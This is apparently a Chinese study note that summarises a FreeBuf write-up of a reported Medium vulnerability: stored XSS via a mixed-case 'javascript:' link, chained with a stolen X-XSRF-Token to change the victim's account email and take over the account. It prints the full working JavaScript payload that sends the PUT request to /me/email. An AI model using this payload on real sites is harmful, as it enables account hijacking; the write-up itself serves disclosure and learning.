摘自freebuf
出处:https://www.freebuf.com/vuls/211253.html
漏洞出处:Medium
关键点:
1.登陆后的用户可以修改注册邮箱,且此步骤不需要进行验证,可以向该邮箱发送包含临时登录的URL链接。
2.关键cookie被设置了HTTPonly。
3.HTTP头中存在X-XSRF-Token,可以使用js盗取。
漏洞发现过程:发现博客文章中jAvAsCrIpT:confirm()可以实现弹窗,即存在存储型XSS,但cookie无法盗取。构造请求,发现HTTP头中存在X-XSRF-Token。
结果:利用存储型XSS,利用XHR构造PUT请求,设置HTTP头,其中包含用js获取的X-XSRF-Token,请求具体内容为修改用户注册邮箱。最终向自定义的该邮箱发送一条包含临时登录的URL链接,实现账号劫持。
最终payload:
JaVaScRiPt:var x=window.preloaded_state.session.xsrf;var h = new XMLHttpRequest();h.open(‘PUT’, ‘/me/email’, true);h.setRequestHeader(‘Content-Type’, ‘application/json’);h.setRequestHeader(‘X-XSRF-Token’, x);h.send(‘{“email”:”attacker@malicious.com”}’);
思考:
1.向自定义的该邮箱发送一条包含临时登录的URL链接:包含临时登陆的URL链接,不太清楚这里的原理。
2.Medium安全团队响应并奖励$1000美金:感觉漏洞很简单。。居然这么多奖金0.0